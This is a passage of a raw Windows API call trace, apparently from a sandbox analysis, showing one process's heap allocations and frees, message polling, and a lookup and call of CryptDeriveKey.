RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0249.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0249.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0249.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0249.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0249.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0249.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0249.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0249.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0249.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0249.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0249.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0249.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0249.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0249.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0249.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0249.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0249.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0249.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0249.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0249.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0249.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0249.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0249.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0249.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0249.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0249.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0249.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0249.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0249.398] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0249.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e51ad8 [0249.399] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e51ad8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0249.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0249.399] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0249.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0249.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0249.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0249.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0249.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0249.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0249.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0249.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0249.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0249.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0249.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0249.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0249.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0249.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0249.399] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa876d0, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87690) returned 1 [0249.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0249.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0249.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0249.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0249.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0249.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0249.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0249.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0249.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0249.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0249.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0249.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0249.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0249.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0249.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0249.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0249.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0249.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0249.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0249.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0249.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0249.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0249.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0249.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0249.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0249.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0249.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0249.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0249.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0249.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0249.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0249.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0249.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0249.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0249.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0249.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0249.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0249.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0249.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0249.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0249.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0249.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0249.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0249.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0249.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0249.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0249.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0249.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0249.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0249.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0249.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0249.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0249.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0249.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0249.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0249.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0249.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0249.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0249.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0249.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0249.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0249.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0249.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0249.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0249.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0249.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0249.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0249.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0249.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0249.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51850 | out: hHeap=0x970000) returned 1 [0249.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0249.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0249.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0249.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0249.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0249.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0249.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0249.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0249.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0249.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977b48 | out: hHeap=0x970000) returned 1 [0249.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0249.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0249.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0249.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0249.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0249.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0249.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563c8 | out: hHeap=0x970000) returned 1 [0249.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e563c8 [0249.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0249.402] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0249.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0249.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0249.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0249.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0249.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0249.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0249.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0249.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0249.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0249.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0249.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0249.403] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0249.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0249.403] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0249.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0249.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0249.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0249.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0249.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0249.403] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0249.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0249.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0249.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0249.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0249.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0249.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0249.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0249.403] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0249.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0249.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0249.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0249.404] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0249.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0249.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0249.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0249.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0249.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0249.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0249.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0249.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e516b8 [0249.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51898 [0249.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e516d0 [0249.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0249.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51688 [0249.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0249.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0249.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51730 [0249.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e515f8 [0249.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e515e0 [0249.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0249.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51838 [0249.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0249.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0249.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51820 [0249.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0249.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e518b0 [0249.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51760 [0249.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0249.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51850 [0249.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51790 [0249.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0249.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e517d8 [0249.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e517c0 [0249.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0249.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0249.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0249.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e56098 [0249.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0249.405] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0249.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56098 | out: hHeap=0x970000) returned 1 [0249.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0249.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51640 [0249.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0249.405] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0249.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0249.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0249.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0249.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0249.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0249.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0249.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0249.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0249.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0249.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0249.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0249.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0249.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0249.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0249.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0249.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0249.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0249.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0249.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0249.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0249.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0249.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0249.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0249.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0249.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0249.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0249.406] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0249.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0249.406] RtlAllocateHeap 